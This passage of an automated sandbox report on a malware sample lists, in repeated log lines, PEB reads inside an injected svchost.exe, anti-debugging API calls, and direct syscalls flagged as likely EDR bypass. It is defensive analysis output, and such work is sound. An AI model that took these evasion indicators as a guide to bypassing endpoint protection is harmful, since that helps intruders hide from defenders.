            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h]2_2_036B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h]2_2_036B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036545B1 mov eax, dword ptr fs:[00000030h]2_2_036545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036545B1 mov eax, dword ptr fs:[00000030h]2_2_036545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632582 mov eax, dword ptr fs:[00000030h]2_2_03632582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632582 mov ecx, dword ptr fs:[00000030h]2_2_03632582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03664588 mov eax, dword ptr fs:[00000030h]2_2_03664588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E59C mov eax, dword ptr fs:[00000030h]2_2_0366E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BC460 mov ecx, dword ptr fs:[00000030h]2_2_036BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h]2_2_0365A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h]2_2_0365A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h]2_2_0365A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EA456 mov eax, dword ptr fs:[00000030h]2_2_036EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362645D mov eax, dword ptr fs:[00000030h]2_2_0362645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365245A mov eax, dword ptr fs:[00000030h]2_2_0365245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h]2_2_0362E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h]2_2_0362E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h]2_2_0362E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C427 mov eax, dword ptr fs:[00000030h]2_2_0362C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A430 mov eax, dword ptr fs:[00000030h]2_2_0366A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668402 mov eax, dword ptr fs:[00000030h]2_2_03668402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668402 mov eax, dword ptr fs:[00000030h]2_2_03668402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668402 mov eax, dword ptr fs:[00000030h]2_2_03668402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036304E5 mov ecx, dword ptr fs:[00000030h]2_2_036304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036364AB mov eax, dword ptr fs:[00000030h]2_2_036364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036644B0 mov ecx, dword ptr fs:[00000030h]2_2_036644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BA4B0 mov eax, dword ptr fs:[00000030h]2_2_036BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EA49A mov eax, dword ptr fs:[00000030h]2_2_036EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362CB7E mov eax, dword ptr fs:[00000030h]2_2_0362CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E4B4B mov eax, dword ptr fs:[00000030h]2_2_036E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E4B4B mov eax, dword ptr fs:[00000030h]2_2_036E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]2_2_03702B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]2_2_03702B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]2_2_03702B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]2_2_03702B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6B40 mov eax, dword ptr fs:[00000030h]2_2_036C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6B40 mov eax, dword ptr fs:[00000030h]2_2_036C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FAB40 mov eax, dword ptr fs:[00000030h]2_2_036FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D8B42 mov eax, dword ptr fs:[00000030h]2_2_036D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628B50 mov eax, dword ptr fs:[00000030h]2_2_03628B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DEB50 mov eax, dword ptr fs:[00000030h]2_2_036DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365EB20 mov eax, dword ptr fs:[00000030h]2_2_0365EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365EB20 mov eax, dword ptr fs:[00000030h]2_2_0365EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F8B28 mov eax, dword ptr fs:[00000030h]2_2_036F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F8B28 mov eax, dword ptr fs:[00000030h]2_2_036F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704B00 mov eax, dword ptr fs:[00000030h]2_2_03704B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638BF0 mov eax, dword ptr fs:[00000030h]2_2_03638BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638BF0 mov eax, dword ptr fs:[00000030h]2_2_03638BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638BF0 mov eax, dword ptr fs:[00000030h]2_2_03638BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365EBFC mov eax, dword ptr fs:[00000030h]2_2_0365EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BCBF0 mov eax, dword ptr fs:[00000030h]2_2_036BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03650BCB mov eax, dword ptr fs:[00000030h]2_2_03650BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03650BCB mov eax, dword ptr fs:[00000030h]2_2_03650BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03650BCB mov eax, dword ptr fs:[00000030h]2_2_03650BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630BCD mov eax, dword ptr fs:[00000030h]2_2_03630BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630BCD mov eax, dword ptr fs:[00000030h]2_2_03630BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630BCD mov eax, dword ptr fs:[00000030h]2_2_03630BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DEBD0 mov eax, dword ptr fs:[00000030h]2_2_036DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640BBE mov eax, dword ptr fs:[00000030h]2_2_03640BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640BBE mov eax, dword ptr fs:[00000030h]2_2_03640BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E4BB0 mov eax, dword ptr fs:[00000030h]2_2_036E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E4BB0 mov eax, dword ptr fs:[00000030h]2_2_036E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366CA6F mov eax, dword ptr fs:[00000030h]2_2_0366CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366CA6F mov eax, dword ptr fs:[00000030h]2_2_0366CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366CA6F mov eax, dword ptr fs:[00000030h]2_2_0366CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DEA60 mov eax, dword ptr fs:[00000030h]2_2_036DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036ACA72 mov eax, dword ptr fs:[00000030h]2_2_036ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036ACA72 mov eax, dword ptr fs:[00000030h]2_2_036ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640A5B mov eax, dword ptr fs:[00000030h]2_2_03640A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640A5B mov eax, dword ptr fs:[00000030h]2_2_03640A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366CA24 mov eax, dword ptr fs:[00000030h]2_2_0366CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365EA2E mov eax, dword ptr fs:[00000030h]2_2_0365EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03654A35 mov eax, dword ptr fs:[00000030h]2_2_03654A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03654A35 mov eax, dword ptr fs:[00000030h]2_2_03654A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366CA38 mov eax, dword ptr fs:[00000030h]2_2_0366CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BCA11 mov eax, dword ptr fs:[00000030h]2_2_036BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366AAEE mov eax, dword ptr fs:[00000030h]2_2_0366AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366AAEE mov eax, dword ptr fs:[00000030h]2_2_0366AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03686ACC mov eax, dword ptr fs:[00000030h]2_2_03686ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03686ACC mov eax, dword ptr fs:[00000030h]2_2_03686ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03686ACC mov eax, dword ptr fs:[00000030h]2_2_03686ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630AD0 mov eax, dword ptr fs:[00000030h]2_2_03630AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03664AD0 mov eax, dword ptr fs:[00000030h]2_2_03664AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03664AD0 mov eax, dword ptr fs:[00000030h]2_2_03664AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638AA0 mov eax, dword ptr fs:[00000030h]2_2_03638AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638AA0 mov eax, dword ptr fs:[00000030h]2_2_03638AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03686AA4 mov eax, dword ptr fs:[00000030h]2_2_03686AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704A80 mov eax, dword ptr fs:[00000030h]2_2_03704A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668A90 mov edx, dword ptr fs:[00000030h]2_2_03668A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03656962 mov eax, dword ptr fs:[00000030h]2_2_03656962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03656962 mov eax, dword ptr fs:[00000030h]2_2_03656962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03656962 mov eax, dword ptr fs:[00000030h]2_2_03656962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367096E mov eax, dword ptr fs:[00000030h]2_2_0367096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367096E mov edx, dword ptr fs:[00000030h]2_2_0367096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367096E mov eax, dword ptr fs:[00000030h]2_2_0367096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D4978 mov eax, dword ptr fs:[00000030h]2_2_036D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D4978 mov eax, dword ptr fs:[00000030h]2_2_036D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BC97C mov eax, dword ptr fs:[00000030h]2_2_036BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0946 mov eax, dword ptr fs:[00000030h]2_2_036B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704940 mov eax, dword ptr fs:[00000030h]2_2_03704940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B892A mov eax, dword ptr fs:[00000030h]2_2_036B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C892B mov eax, dword ptr fs:[00000030h]2_2_036C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE908 mov eax, dword ptr fs:[00000030h]2_2_036AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE908 mov eax, dword ptr fs:[00000030h]2_2_036AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BC912 mov eax, dword ptr fs:[00000030h]2_2_036BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628918 mov eax, dword ptr fs:[00000030h]2_2_03628918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628918 mov eax, dword ptr fs:[00000030h]2_2_03628918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE9E0 mov eax, dword ptr fs:[00000030h]2_2_036BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036629F9 mov eax, dword ptr fs:[00000030h]2_2_036629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036629F9 mov eax, dword ptr fs:[00000030h]2_2_036629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C69C0 mov eax, dword ptr fs:[00000030h]2_2_036C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036649D0 mov eax, dword ptr fs:[00000030h]2_2_036649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FA9D3 mov eax, dword ptr fs:[00000030h]2_2_036FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036309AD mov eax, dword ptr fs:[00000030h]2_2_036309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036309AD mov eax, dword ptr fs:[00000030h]2_2_036309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B89B3 mov esi, dword ptr fs:[00000030h]2_2_036B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B89B3 mov eax, dword ptr fs:[00000030h]2_2_036B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B89B3 mov eax, dword ptr fs:[00000030h]2_2_036B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE872 mov eax, dword ptr fs:[00000030h]2_2_036BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE872 mov eax, dword ptr fs:[00000030h]2_2_036BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6870 mov eax, dword ptr fs:[00000030h]2_2_036C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6870 mov eax, dword ptr fs:[00000030h]2_2_036C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03642840 mov ecx, dword ptr fs:[00000030h]2_2_03642840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660854 mov eax, dword ptr fs:[00000030h]2_2_03660854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634859 mov eax, dword ptr fs:[00000030h]2_2_03634859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634859 mov eax, dword ptr fs:[00000030h]2_2_03634859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652835 mov eax, dword ptr fs:[00000030h]2_2_03652835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652835 mov eax, dword ptr fs:[00000030h]2_2_03652835
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F80B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00F80B62
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F52622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F52622
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F4083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F4083F
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F409D5 SetUnhandledExceptionFilter,0_2_00F409D5
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F40C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00F40C21

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeNtUnmapViewOfSection: Direct from: 0x76EF2D3CJump to behavior
